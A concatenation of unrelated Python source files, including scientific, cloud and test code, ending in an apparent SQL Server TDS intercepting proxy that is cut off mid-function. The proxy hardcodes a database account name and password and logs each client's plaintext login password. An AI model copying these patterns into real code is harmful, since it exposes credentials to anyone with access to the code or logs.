cp_parameter_array)
self.precision_target = target_time_series.TargetPrecision(self)
# mcmc object evaluated at instantiate_mcmc
self.precision_mcmc = None
self.gibbs_weight = [0.003*len(self), 1, 0.2]
def instantiate_mcmc(self):
"""Instantiate all MCMC objects
Override - instantiate the MCMC for the precision
"""
super().instantiate_mcmc()
self.precision_target.prograte_precision()
self.precision_mcmc = mcmc.Rwmh(
self.precision_target, self.rng, self.n_sample, self.memmap_dir)
def get_mcmc_array(self):
mcmc_array = super().get_mcmc_array()
mcmc_array.append(self.precision_mcmc)
return mcmc_array
def simulate_parameter_from_prior(self):
"""Simulate parameter from the prior
Override - Sample the precision from the prior and then sample the
parameter from the prior
"""
self.precision_target.set_from_prior(self.rng)
self.precision_target.prograte_precision()
return super().simulate_parameter_from_prior()
def print_chain_property(self, directory):
super().print_chain_property(directory)
precision_chain = np.asarray(self.precision_mcmc[:])
for i in range(2):
chain_i = precision_chain[:, i]
plt.figure()
plt.plot(chain_i)
plt.ylabel("precision" + str(i))
plt.xlabel("Sample number")
plt.savefig(
path.join(directory, "chain_precision_" + str(i) + ".pdf"))
plt.close()
plt.figure()
plt.plot(np.asarray(self.precision_mcmc.accept_array))
plt.ylabel("Acceptance rate of parameters")
plt.xlabel("Parameter sample number")
plt.savefig(path.join(directory, "accept_precision.pdf"))
plt.close()
def static_initalise_z(time_series):
"""Static version of initalise_z(). Used for parallel programming.
"""
time_series.initalise_z()
return time_series
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include".split(';') if "${prefix}/include" != "" else []
PROJECT_CATKIN_DEPENDS = "roscpp;std_msgs;sensor_msgs;geometry_msgs;nav_msgs;tf;turtlebot3_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "turtlebot3_fake"
PROJECT_SPACE_DIR = "/root/catkin_ws/install"
PROJECT_VERSION = "1.3.0"
|
import os
import pytest
import salt.utils.verify
from tests.support.mock import patch
@pytest.mark.skip_on_windows(reason="Not applicable for Windows.")
@patch("os.chown")
@patch("os.stat")
def test_verify_env_race_condition(mock_stat, mock_chown):
def _stat(path):
"""
Helper function for mock_stat, we want to raise errors for specific paths, but not until we get into the proper path.
Until then, just return plain os.stat_result
"""
if path in ("/tmp/salt-dir/.file3", "/tmp/salt-dir/.dir3"):
raise AssertionError("The .file3 and .dir3 paths should never be called!")
if path in ("/tmp/salt-dir/file1", "/tmp/salt-dir/dir1"):
raise FileNotFoundError(
"[Errno 2] No such file or directory: this exception should not be visible"
)
# we need to return at least different st_uid in order to trigger chown for these paths
if path in ("/tmp/salt-dir/file4", "/tmp/salt-dir/dir4"):
return os.stat_result([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11])
return os.stat_result([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
def _chown(path, uid, gid):
if path in ("/tmp/salt-dir/file4", "/tmp/salt-dir/dir4"):
raise FileNotFoundError(
"[Errno 2] No such file or directory: this exception should not be visible"
)
return
mock_stat.side_effect = _stat
mock_chown.side_effect = _chown
with patch("salt.utils.verify._get_pwnam", return_value=(None, None, 0, 0)), patch(
"os.getuid", return_value=0
), patch("os.listdir", return_value=["subdir"]), patch(
"os.path.isdir", return_value=True
), patch(
"salt.utils.path.os_walk",
return_value=[
(
"/tmp/salt-dir",
["dir1", "dir2", ".dir3", "dir4"],
["file1", "file2", ".file3", "file4"],
)
],
):
# verify this runs without issues, even though FNFE is raised
salt.utils.verify.verify_env(["/tmp/salt-dir"], "root", skip_extra=True)
# and verify it got actually called with the valid paths
mock_stat.assert_any_call("/tmp/salt-dir/file1")
mock_stat.assert_any_call("/tmp/salt-dir/dir1")
mock_stat.assert_any_call("/tmp/salt-dir/file4")
mock_stat.assert_any_call("/tmp/salt-dir/dir4")
mock_chown.assert_any_call("/tmp/salt-dir/file4", 0, 0)
mock_chown.assert_any_call("/tmp/salt-dir/dir4", 0, 0)
|
"""Generate a 256-bit private key."""
import sys
import secrets
argv = sys.argv
error_msg = "Must confirm by running: python gen_key.py [KEY_FILE_PATH] confirm"
if len(argv) > 2:
if argv[2] == "confirm":
try:
with open(argv[1], "w") as f:
print("A new key is generated at %s" % argv[1])
print(secrets.token_urlsafe(32), file=f)
except Exception as e:
print(e)
else:
print(error_msg)
else:
print(error_msg)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
功能实现:检查所提供的函数是否对列表中至少一个元素返回True。
解读:
结合使用any()和map()检查fn是否为列表中的任何元素返回True
"""
def some(lst, fn=lambda x: x):
return any(map(fn, lst))
# Examples
print(some([0, 1, 2, 0], lambda x: x >= 2))
print(some([0, 0, 1, 0]))
# output:
# True
# True
|
#!/usr/bin/env python3
#
# This file is part of Magnum.
#
# Copyright © 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019,
# 2020, 2021, 2022 Vladimír Vondruš <mosra@centrum.cz>
# Copyright © 2020 janos <janos.meny@googlemail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
from numpy import genfromtxt
def format(filename):
data = genfromtxt(filename, delimiter=',')
formatted = ''
data = data[1:,1:].astype(int)
formatted = ''
for i in range(256//4):
line = ' '
for j in range(4):
row = data[4*i+j]
line += '{{{:>3}, {:>3}, {:>3}}}, '.format(row[0], row[1], row[2])
formatted = formatted + line + '\n'
# Strip trailing comma and newline
return formatted[:-3]
# The two CSV files taken from https://www.kennethmoreland.com/color-advice/
print("/* Generated with Implementation/cool-warm.py */")
print("constexpr UnsignedByte CoolWarmSmooth[][3] = {\n", end='')
print(format('smooth-cool-warm-table-byte-0256.csv'))
print("};\n")
print("/* Generated with Implementation/cool-warm.py */")
print("constexpr UnsignedByte CoolWarmBent[][3] = {\n", end='')
print(format('bent-cool-warm-table-byte-0256.csv'))
print("};\n")
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import typing
if typing.TYPE_CHECKING:
from google.cloud import bigquery
def get_routine(routine_id: str) -> "bigquery.Routine":
# [START bigquery_get_routine]
from google.cloud import bigquery
# Construct a BigQuery client object.
client = bigquery.Client()
# TODO(developer): Set the fully-qualified ID for the routine.
# routine_id = "my-project.my_dataset.my_routine"
routine = client.get_routine(routine_id) # Make an API request.
print("Routine '{}':".format(routine.reference))
print("\tType: '{}'".format(routine.type_))
print("\tLanguage: '{}'".format(routine.language))
print("\tArguments:")
for argument in routine.arguments:
print("\t\tName: '{}'".format(argument.name))
print("\t\tType: '{}'".format(argument.data_type))
# [END bigquery_get_routine]
return routine
|
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
"""
Creating two dataframes, for the second and third models,
and using then to plot model performance.
"""
def plot_model_pref(folder="plots", name="Model preformance", bf=False):
# the dataframes
df = pd.DataFrame([[0.98, "full", "NN, micro"], [0.83, "full", "RF, micro"],
[0.64, "missing", "NN, micro"], [0.5, "missing", "RF, micro"],
[0.59, "full", "NN, macro"], [0.5, "full", "RF, macro"],
[0.51, "missing", "NN, macro"], [0.3, "missing", "RF, macro"]
],
columns=["F1 score", "Data", "Model and type"])
df_better_feat = pd.DataFrame([[0.98, "full", "NN, micro"], [0.82, "full", "RF, micro"],
[0.62, "missing", "NN, micro"], [0.51, "missing", "RF, micro"],
[0.63, "full", "NN, macro"], [0.53, "full", "RF, macro"],
[0.51, "missing", "NN, macro"], [0.3, "missing", "RF, macro"]
],
columns=["F1 score", "Data", "Model and type"])
df_dict = {True: df_better_feat, False: df}
fig, ax = plt.subplots()
# drawing the bar plots and adding labels and a title.
ax = sns.barplot(data=df_dict[bf], y="F1 score", x="Model and type", hue="Data", palette="mako")
ax.set_xlabel(color='r', xlabel="Model and type")
ax.set_ylabel(color='r', ylabel="F1 score")
ax.set_title(name)
# saving.
plt.savefig(f"{folder}/{name}.png")
"""
Plotting the clustering model performance
"""
def plot_clustering_pref(folder="plots", name="Cluster preformance"):
# the data of the model performance.
df = pd.DataFrame([[0.266, "Spectral clustering"], [0.264, "DBSCAN"],
[0.17, "GMM"], [0.162, "KMeans"],],
columns=["Silhouette score", "Clustering model"])
fig, ax = plt.subplots()
# drawing the bar plots and adding labels and a title.
ax = sns.barplot(data=df, y="Silhouette score", x="Clustering model", color="teal")
ax.set_xlabel(color='r', xlabel="Clustering Model")
ax.set_ylabel(color='r', ylabel="Silhouette score")
ax.set_title(name)
# saving.
plt.savefig(f"{folder}/{name}.png")
if __name__ == "__main__":
plot_clustering_pref()
plot_model_pref(bf=True, name="Better features model performance")
plot_model_pref()
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
# pylint: disable=unused-import
def setup(test):
# import time
test.kwargs.update({
"vaultName": "cli-test-new-vault",
"rg": "sarath-rg",
"diskname": "cli-test-disk-new",
"restorediskname": "cli-test-disk-new-restored",
"policyname": "diskpolicy"
})
account_res = test.cmd('az account show').get_output_in_json()
vault_res = test.cmd('az dataprotection backup-vault create '
'-g "{rg}" --vault-name "{vaultName}" -l centraluseuap '
'--storage-settings datastore-type="VaultStore" type="LocallyRedundant" --type SystemAssigned',
checks=[]).get_output_in_json()
disk_response = test.cmd('az disk create -g "{rg}" -n "{diskname}" --size-gb 4').get_output_in_json()
test.kwargs.update({
"principalId": vault_res["identity"]["principalId"],
"diskid": disk_response["id"],
"rgid": "/subscriptions/" + account_res["id"] + "/resourceGroups/sarath-rg"
})
# run the below commands only in record mode
# time.sleep(180)
# test.cmd('az role assignment create --assignee "{principalId}" --role "Disk Backup Reader" --scope "{diskid}"')
# test.cmd('az role assignment create --assignee "{principalId}" --role "Disk Snapshot Contributor" --scope "{rgid}"')
# test.cmd('az role assignment create --assignee "{principalId}" --role "Disk Restore Operator" --scope "{rgid}"')
def create_policy(test):
policy_json = test.cmd('az dataprotection backup-policy get-default-policy-template --datasource-type AzureDisk').get_output_in_json()
test.kwargs.update({"policyjson": policy_json})
test.cmd('az dataprotection backup-policy create -n "{policyname}" --policy "{policyjson}" -g "{rg}" --vault-name "{vaultName}"')
policy_id = test.cmd('az dataprotection backup-policy show -g "{rg}" --vault-name "{vaultName}" -n "{policyname}" --query "id"').get_output_in_json()
test.kwargs.update({"policyid": policy_id})
lifecycle_json = test.cmd('az dataprotection backup-policy retention-rule create-lifecycle'
' --count 12 --type Days --source-datastore OperationalStore').get_output_in_json()
test.kwargs.update({"lifecycle": lifecycle_json})
policy_json = test.cmd('az dataprotection backup-policy retention-rule set '
' --name Daily --policy "{policyjson}" --lifecycles "{lifecycle}"').get_output_in_json()
test.kwargs.update({"policyjson": policy_json})
criteria_json = test.cmd('az dataprotection backup-policy tag create-absolute-criteria --absolute-criteria FirstOfDay').get_output_in_json()
test.kwargs.update({"criteria": criteria_json})
policy_json = test.cmd('az dataprotection backup-policy tag set '
' --name Daily --policy "{policyjson}" --criteria "{criteria}"').get_output_in_json()
test.kwargs.update({"policyjson": policy_json})
schedule_json = test.cmd('az dataprotection backup-policy trigger create-schedule --interval-type Hourly --interval-count 6 --schedule-days 2021-05-02T05:30:00').get_output_in_json()
test.kwargs.update({"repeating_time_interval": schedule_json[0]})
policy_json = test.cmd('az dataprotection backup-policy trigger set '
' --policy "{policyjson}" --schedule "{repeating_time_interval}"').get_output_in_json()
test.kwargs.update({"policyjson": policy_json})
test.cmd('az dataprotection backup-policy create -n diskhourlypolicy --policy "{policyjson}" -g "{rg}" --vault-name "{vaultName}"')
def trigger_disk_backup(test):
# import time
response_json = test.cmd('az dataprotection backup-instance adhoc-backup -n "{backup_instance_name}" -g "{rg}" --vault-name "{vaultName}" --rule-name BackupHourly --retention-tag-override Default').get_output_in_json()
job_status = None
test.kwargs.update({"backup_job_id": response_json["jobId"]})
while job_status != "Completed":
# run the below code only in record mode
# time.sleep(10)
job_response = test.cmd('az dataprotection job show --ids "{backup_job_id}"').get_output_in_json()
job_status = job_response["properties"]["status"]
if job_status not in ["Completed", "InProgress"]:
raise Exception("Undefined job status received")
def trigger_disk_restore(test):
# import time
rp_json = test.cmd('az dataprotection recovery-point list --backup-instance-name "{backup_instance_name}" -g "{rg}" --vault-name "{vaultName}"').get_output_in_json()
test.kwargs.update({"rp_id": rp_json[0]["name"]})
split_disk_id = test.kwargs["diskid"].split("/")
split_disk_id[-1] = test.kwargs["restorediskname"]
restore_disk_id = "/".join(split_disk_id)
test.kwargs.update({"restore_disk_id": restore_disk_id})
restore_json = test.cmd('az dataprotection backup-instance restore initialize-for-data-recovery'
' --datasource-type AzureDisk --restore-location centraluseuap --source-datastore OperationalStore '
'--recovery-point-id "{rp_id}" --target-resource-id "{restore_disk_id}"').get_output_in_json()
test.kwargs.update({"restore_request": restore_json})
test.cmd('az dataprotection backup-instance validate-for-restore -g "{rg}" --vault-name "{vaultName}" -n "{backup_instance_name}" --restore-request-object "{restore_request}"')
response_json = test.cmd('az dataprotection backup-instance restore trigger -g "{rg}" --vault-name "{vaultName}"'
' -n "{backup_instance_name}" --restore-request-object "{restore_request}"').get_output_in_json()
job_status = None
test.kwargs.update({"backup_job_id": response_json["jobId"]})
while job_status != "Completed":
# run the below code only in record mode
# time.sleep(10)
job_response = test.cmd('az dataprotection job show --ids "{backup_job_id}"').get_output_in_json()
job_status = job_response["properties"]["status"]
if job_status not in ["Completed", "InProgress"]:
raise Exception("Undefined job status received")
def configure_backup(test):
import time
backup_instance_guid = "b7e6f082-b310-11eb-8f55-9cfce85d4fae"
backup_instance_json = test.cmd('az dataprotection backup-instance initialize --datasource-type AzureDisk'
' -l centraluseuap --policy-id "{policyid}" --datasource-id "{diskid}"').get_output_in_json()
backup_instance_json["properties"]["policy_info"]["policy_parameters"]["data_store_parameters_list"][0]["resource_group_id"] = test.kwargs["rgid"]
backup_instance_json["backup_instance_name"] = test.kwargs['diskname'] + "-" + test.kwargs['diskname'] + "-" + backup_instance_guid
test.kwargs.update({
"backup_instance_json": backup_instance_json,
"backup_instance_name": backup_instance_json["backup_instance_name"]
})
test.cmd('az dataprotection backup-instance create -g "{rg}" --vault-name "{vaultName}" --backup-instance "{backup_instance_json}"')
backup_instance_res = test.cmd('az dataprotection backup-instance list -g "{rg}" --vault-name "{vaultName}" --query "[0].properties.protectionStatus"').get_output_in_json()
protection_status = backup_instance_res["status"]
while protection_status != "ProtectionConfigured":
# run the below line only in record mode
# time.sleep(10)
backup_instance_res = test.cmd('az dataprotection backup-instance list -g "{rg}" --vault-name "{vaultName}" --query "[0].properties.protectionStatus"').get_output_in_json()
protection_status = backup_instance_res["status"]
# run the below line only in record mode
time.sleep(30)
def delete_backup(test):
test.cmd('az dataprotection backup-instance delete -g "{rg}" --vault-name "{vaultName}" -n "{backup_instance_name}" --yes')
def cleanup(test):
delete_backup(test)
test.cmd('az dataprotection backup-vault delete '
' -g "{rg}" --vault-name "{vaultName}" --yes')
test.cmd('az disk delete --name "{diskname}" --resource-group "{rg}" --yes')
test.cmd('az disk delete --name "{restorediskname}" --resource-group "{rg}" --yes')
def call_scenario(test):
setup(test)
try:
create_policy(test)
configure_backup(test)
trigger_disk_backup(test)
trigger_disk_restore(test)
except Exception as e:
raise e
finally:
cleanup(test)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on April 2020
@author: Thomas Bonald <bonald@enst.fr>
"""
from typing import Iterable, Optional
import numpy as np
from sknetwork.hierarchy.postprocess import cut_straight
from sknetwork.visualization.colors import STANDARD_COLORS
def get_index(dendrogram, reorder=True):
"""Index nodes for pretty dendrogram."""
n = dendrogram.shape[0] + 1
tree = {i: [i] for i in range(n)}
for t in range(n - 1):
i = int(dendrogram[t, 0])
j = int(dendrogram[t, 1])
left: list = tree.pop(i)
right: list = tree.pop(j)
if reorder and len(left) < len(right):
tree[n + t] = right + left
else:
tree[n + t] = left + right
return list(tree.values())[0]
def svg_dendrogram_top(dendrogram, names, width, height, margin, margin_text, scale, line_width, n_clusters,
color, colors, font_size, reorder, rotate_names):
"""Dendrogram as SVG image with root on top."""
# scaling
height *= scale
width *= scale
# positioning
labels = cut_straight(dendrogram, n_clusters, return_dendrogram=False)
index = get_index(dendrogram, reorder)
n = len(index)
unit_height = height / dendrogram[-1, 2]
unit_width = width / n
height_basis = margin + height
position = {index[i]: (margin + i * unit_width, height_basis) for i in range(n)}
label = {i: l for i, l in enumerate(labels)}
width += 2 * margin
height += 2 * margin
if names is not None:
text_length = np.max(np.array([len(str(name)) for name in names]))
height += text_length * font_size * .5 + margin_text
svg = """<svg width="{}" height="{}" xmlns="http://www.w3.org/2000/svg">""".format(width, height)
# text
if names is not None:
for i in range(n):
x, y = position[i]
x -= margin_text
y += margin_text
text = str(names[i]).replace('&', ' ')
if rotate_names:
svg += """<text x="{}" y="{}" transform="rotate(60, {}, {})" font-size="{}">{}</text>""" \
.format(x, y, x, y, font_size, text)
else:
y += margin_text
svg += """<text x="{}" y="{}" font-size="{}">{}</text>""" \
.format(x, y, font_size, text)
# tree
for t in range(n - 1):
i = int(dendrogram[t, 0])
j = int(dendrogram[t, 1])
x1, y1 = position.pop(i)
x2, y2 = position.pop(j)
l1 = label.pop(i)
l2 = label.pop(j)
if l1 == l2:
line_color = colors[l1 % len(colors)]
else:
line_color = color
x = .5 * (x1 + x2)
y = height_basis - dendrogram[t, 2] * unit_height
svg += """<path stroke-width="{}" stroke="{}" d="M {} {} {} {}" />"""\
.format(line_width, line_color, x1, y1, x1, y)
svg += """<path stroke-width="{}" stroke="{}" d="M {} {} {} {}" />"""\
.format(line_width, line_color, x2, y2, x2, y)
svg += """<path stroke-width="{}" stroke="{}" d="M {} {} {} {}" />"""\
.format(line_width, line_color, x1, y, x2, y)
position[n + t] = (x, y)
label[n + t] = l1
svg += '</svg>'
return svg
def svg_dendrogram_left(dendrogram, names, width, height, margin, margin_text, scale, line_width, n_clusters,
color, colors, font_size, reorder):
"""Dendrogram as SVG image with root on left side."""
# scaling
height *= scale
width *= scale
# positioning
labels = cut_straight(dendrogram, n_clusters, return_dendrogram=False)
index = get_index(dendrogram, reorder)
n = len(index)
unit_height = height / n
unit_width = width / dendrogram[-1, 2]
width_basis = width + margin
position = {index[i]: (width_basis, margin + i * unit_height) for i in range(n)}
label = {i: l for i, l in enumerate(labels)}
width += 2 * margin
height += 2 * margin
if names is not None:
text_length = np.max(np.array([len(str(name)) for name in names]))
width += text_length * font_size * .5 + margin_text
svg = """<svg width="{}" height="{}" xmlns="http://www.w3.org/2000/svg">""".format(width, height)
# text
if names is not None:
for i in range(n):
x, y = position[i]
x += margin_text
y += unit_height / 3
text = str(names[i]).replace('&', ' ')
svg += """<text x="{}" y="{}" font-size="{}">{}</text>""" \
.format(x, y, font_size, text)
# tree
for t in range(n - 1):
i = int(dendrogram[t, 0])
j = int(dendrogram[t, 1])
x1, y1 = position.pop(i)
x2, y2 = position.pop(j)
l1 = label.pop(i)
l2 = label.pop(j)
if l1 == l2:
line_color = colors[l1 % len(colors)]
else:
line_color = color
y = .5 * (y1 + y2)
x = width_basis - dendrogram[t, 2] * unit_width
svg += """<path stroke-width="{}" stroke="{}" d="M {} {} {} {}" />"""\
.format(line_width, line_color, x1, y1, x, y1)
svg += """<path stroke-width="{}" stroke="{}" d="M {} {} {} {}" />"""\
.format(line_width, line_color, x2, y2, x, y2)
svg += """<path stroke-width="{}" stroke="{}" d="M {} {} {} {}" />"""\
.format(line_width, line_color, x, y1, x, y2)
position[n + t] = (x, y)
label[n + t] = l1
svg += '</svg>'
return svg
def svg_dendrogram(dendrogram: np.ndarray, names: Optional[np.ndarray] = None, rotate: bool = False, width: float = 400,
height: float = 300, margin: float = 10, margin_text: float = 5, scale: float = 1,
line_width: float = 2, n_clusters: int = 2, color: str = 'black', colors: Optional[Iterable] = None,
font_size: int = 12, reorder: bool = False, rotate_names: bool = True,
filename: Optional[str] = None):
"""Return SVG image of a dendrogram.
Parameters
----------
dendrogram :
Dendrogram to display.
names :
Names of leaves.
rotate :
If ``True``, rotate the tree so that the root is on the left.
width :
Width of the image (margins excluded).
height :
Height of the image (margins excluded).
margin :
Margin.
margin_text :
Margin between leaves and their names, if any.
scale :
Scaling factor.
line_width :
Line width.
n_clusters :
Number of coloured clusters to display.
color :
Default SVG color for the dendrogram.
colors :
SVG colors of the clusters of the dendrogram (optional).
font_size :
Font size.
reorder :
If ``True``, reorder leaves so that left subtree has more leaves than right subtree.
rotate_names :
If ``True``, rotate names of leaves (only valid if **rotate** is ``False``).
filename :
Filename for saving image (optional).
Example
-------
>>> dendrogram = np.array([[0, 1, 1, 2], [2, 3, 2, 3]])
>>> from sknetwork.visualization import svg_dendrogram
>>> image = svg_dendrogram(dendrogram)
>>> image[1:4]
'svg'
"""
if colors is None:
colors = STANDARD_COLORS
elif isinstance(colors, dict):
colors = np.array(list(colors.values()))
elif isinstance(colors, list):
colors = np.array(colors)
if rotate:
svg = svg_dendrogram_left(dendrogram, names, width, height, margin, margin_text, scale, line_width, n_clusters,
color, colors, font_size, reorder)
else:
svg = svg_dendrogram_top(dendrogram, names, width, height, margin, margin_text, scale, line_width, n_clusters,
color, colors, font_size, reorder, rotate_names)
if filename is not None:
with open(filename + '.svg', 'w') as f:
f.write(svg)
return svg
|
import datetime
import hashlib
import bs4
# XXX We may want to suppress soupsieve warning later on
def fill_header(src_filename, dst_filename):
"""Populate HTML <header></header> of file specified by dst_filename."""
filename = src_filename
hashsum = sha256sum(src_filename)
timezone = datetime.timezone.utc
timestamp = datetime.datetime.now(timezone)
with open(dst_filename, 'r', encoding='utf-8') as file:
html = bs4.BeautifulSoup(file, features='html.parser')
filename_tag = html.new_tag('p')
filename_tag['id'] = 'filename'
filename_tag.string = f'File: {filename}'
hashsum_tag = html.new_tag('p')
hashsum_tag.string = f'Hash (SHA256): {hashsum}'
timestamp_tag = html.new_tag('p')
timestamp_tag.string = f'Time (UTC): {timestamp}'
header = html.header
header.append(filename_tag)
header.append(hashsum_tag)
header.append(timestamp_tag)
with open(dst_filename, 'w', encoding='utf-8') as file:
file.write(html.prettify())
file.truncate()
def sha256sum(filename):
"""Return the SHA256 string representation of file specified by filename."""
CHUNK_SIZE = 65536
sha256 = hashlib.sha256()
with open(filename, 'rb') as file:
while True:
chunk = file.read(CHUNK_SIZE)
if not chunk:
break
sha256.update(chunk)
return sha256.hexdigest()
def main():
# XXX Usage example
src = r'%LOCALAPPDATA%\Packages\Facebook.FacebookMessenger_8xx8rvfyw5nnt\LocalState\msys_100047488492327.db'
dst = r'%USERPROFILE%\Desktop\stub.html'
fill_header(src, dst)
if __name__ == '__main__':
main()
|
import pandas as pd
import numpy as np
import scipy.stats as ss
def cramers_v(confusion_matrix: pd.DataFrame) -> int:
"""
Calculate Cramers V statistic for categorial-categorial association.
uses correction from Bergsma and Wicher,
Journal of the Korean Statistical Society 42 (2013): 323-328
:param confusion_matrix: Input table of values.
:return: Correlation of values in input confusion_matrix. Close to 1 - strong association,
close to 0 - weak association.
"""
chi2 = ss.chi2_contingency(confusion_matrix)[0]
n = confusion_matrix.sum()
phi2 = chi2 / n
r, k = confusion_matrix.shape
phi2corr = max(0, phi2 - ((k-1)*(r-1))/(n-1))
rcorr = r - ((r-1)**2)/(n-1)
kcorr = k - ((k-1)**2)/(n-1)
return np.sqrt(phi2corr / min((kcorr-1), (rcorr-1)))
def execute_cramers(input_df: pd.DataFrame, column: str, column_to_compare_with: str) -> int:
"""
Function to execute Cramers V and check input variables.
:param input_df: Dataframe, which function gets columns from.
:param column: Name of the input column.
:param column_to_compare_with: Name of the input column.
:return: Calls cramers_v function and returns its return value.
"""
if (isinstance(column_to_compare_with, str)) and (isinstance(column, str)):
if (input_df.get(column) is not None) and (input_df.get(column_to_compare_with) is not None):
confusion_matrix = pd.crosstab(input_df[column], input_df[column_to_compare_with]).as_matrix()
else:
raise Exception('Cannot execute Cramers V, because at least one of input columns does not exist.')
else:
raise Exception('Cannot execute Cramers V, because at least one input column has wrong variable type.')
return cramers_v(confusion_matrix)
|
import logging
from datetime import datetime
from io import BytesIO
from socket import socket
from time import time
from bunch import Bunch
import user
from pool import manager
from tds import mq
from tds.exceptions import AbortException
from tds.packets import PacketHeader
from tds.request import LoginRequest
from tds.request import PreLoginRequest
from tds.request import SQLBatchRequest
from tds.response import LoginResponse
from tds.tokens import Collation
from tds.tokens import DoneStream
from tds.tokens import EnvChangeStream
from tds.tokens import InfoStream
from tds.tokens import LoginAckStream
from tds.tokens import PreLoginStream
from tds.tokens import parse_tokens
EVENT_LOGIN = "login"
EVENT_LOGOUT = "logout"
EVENT_INPUT = "input"
EVENT_OUTPUT = "output"
EVENT_BATCH = "batch"
class Parser(object):
"""
:type conn: socket
"""
PROCESS = {
0x01: 'on_batch',
0x10: 'on_login',
0x12: 'on_pre_login'
}
PACKET_HEADER_LENGTH = 8
conn = None
user = None
client_ip = None
database = None
db_conn = None
settings = {}
def __init__(self, conn, address, logger=None):
self.logger = logger or logging.getLogger(__name__)
self.conn = conn
self.client_ip = address[0]
def run(self):
while True:
try:
header, data = self.parse_message_header()
if header.packet_type in self.PROCESS:
method = getattr(self, self.PROCESS.get(header.packet_type))
method(header, data)
else:
logging.error('Unknown packet: %s', header.packet_type)
self.on_transfer(header, data)
except AbortException as e:
self.logger.exception(e)
self._send_logout_event()
break
def parse_message_header(self, conn=None):
"""
:param socket conn:
:rtype: (PacketHeader, BytesIO)
"""
conn = conn or self.conn
header = conn.recv(self.PACKET_HEADER_LENGTH)
if len(header) < self.PACKET_HEADER_LENGTH:
# TODO(benjamin): process disconnection
raise AbortException()
packet_header = PacketHeader()
packet_header.unmarshal(header)
length = packet_header.length - self.PACKET_HEADER_LENGTH
data = None
if length:
data = conn.recv(length)
return packet_header, BytesIO(data)
def on_pre_login(self, header, buf):
"""
:param PacketHeader header:
:param BytesIO buf:
"""
request = PreLoginRequest(buf)
response = PreLoginStream()
response.version = (1426128904, 0)
response.encryption = PreLoginStream.ENCRYPT_NOT_SUP
response.inst_opt = ''
response.thread_id = 1234
header = PacketHeader()
content = header.marshal(response)
self.conn.sendall(content)
def on_login(self, header, buf):
"""
:param PacketHeader header:
:param BytesIO buf:
"""
packet = LoginRequest(buf)
info = user.login(packet.username, packet.password)
if info is None:
# TODO(benjamin): process login failed
pass
self.settings = {
"user": "CTIDbo",
"password": "Dev@CTIdb0",
"instance": "S1DSQL04\\EHISSQL",
"database": "CTI",
"ip": "S1DSQL04",
"port": 1433
}
self.user = packet.username
self.database = packet.database
self._send_login_event()
logging.error('logging password %s', packet.password)
response = LoginResponse()
env1 = EnvChangeStream()
env1.add(1, 'CTI', 'master')
sql_collation = Collation()
env2 = EnvChangeStream()
env2.add_bytes(EnvChangeStream.ENV_SQL_COLLATION, sql_collation.marshal())
env3 = EnvChangeStream()
env3.add(EnvChangeStream.ENV_LANGUAGE, 'us_english')
ack = LoginAckStream()
ack.program_name = "TDS"
env = EnvChangeStream()
env.add(EnvChangeStream.ENV_DATABASE, '4096', '4096')
done = DoneStream()
info = InfoStream()
info.msg = "Changed database context to 'CTI'."
info.server_name = 'S1DSQL04\\EHISSQL'
info.line_number = 10
response.add_component(env1)
response.add_component(info)
response.add_component(ack)
response.add_component(env)
response.add_component(done)
header = PacketHeader()
content = header.marshal(response)
self.conn.sendall(content)
def on_batch(self, header, buf):
"""
:param PacketHeader header:
:param BytesIO buf:
:return:
"""
cur = time()
request = SQLBatchRequest(buf)
self.on_transfer(header, buf)
elapse = time() - cur
logging.error('batch sql elapse %s : %s', time() - cur, request.text)
# TODO(benjamin): process batch error
self._send_batch_event(elapse, request.text, error=None)
def on_transfer(self, header, buf, parse_token=False):
"""
:param PacketHeader header:
:param BytesIO buf:
:param bool parse_token:
:rtype: [StreamSerializer]
"""
message = header.marshal(buf)
pool = manager.get_connection(self.settings)
with pool.get() as conn:
conn.sendall(message)
self._send_input_event(message)
header, response_buf = self.parse_message_header(conn)
message = header.marshal(response_buf)
self.conn.sendall(message)
self._send_output_event(message)
items = parse_tokens(response_buf)
def _make_event(self, event):
stamp = datetime.now().strftime('%Y%m%d%H%M%S%f')[:-3]
return Bunch(event=event,
user=self.user,
database=self.database,
client_ip=self.client_ip,
stamp=stamp)
def _send_output_event(self, message):
event = self._make_event(event=EVENT_OUTPUT)
event.size = len(message)
mq.send(event)
def _send_input_event(self, message):
